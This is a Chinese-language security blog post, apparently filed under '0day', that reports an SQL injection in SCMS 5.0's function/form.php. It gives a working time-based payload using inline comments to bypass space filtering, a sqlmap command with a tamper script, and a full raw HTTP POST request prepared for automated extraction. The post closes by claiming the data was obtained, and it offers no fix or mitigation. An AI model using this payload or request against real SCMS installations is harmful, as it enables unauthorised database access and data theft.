您的位置 首页 0day

SCMS代码审计-SQL注入

scms5.0存在sql注入 存在问题脚本:s-cms/function/form.php $action接受…

scms5.0存在sql注入

存在问题脚本:s-cms/function/form.php

$action接受input的参数

如果$x>0则执行下面的语句,这里$x为php的弱类型

用内联注释组合既可构造语句为:/function/form.php?action=input

Post数据:1/**/and/**/sleep(10)=xxx

Post传输查看返回事件

返回为十秒可以,用sqlmap进行跑包测试

sqlmap -r post1 –dbs  –tamper=space2comment.py

数据包

POST /com//function/form.php?action=input HTTP/1.1

Host: 192.168.3.129

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://192.168.3.129/com/

Content-Type: application/x-www-form-urlencoded

Content-Length: 59

Connection: close

Cookie: PHPSESSID=jomeavq2f349ssp336uu4foch1; Hm_lvt_b60316de6009d5654de7312f772162be=1599322523; Hm_lpvt_b60316de6009d5654de7312f772162be=1599322523

Upgrade-Insecure-Requests: 1

1*=xxx

成功拿到数据

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/141/
小小小月球

作者: 小小小月球

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...

评论列表(2)

联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部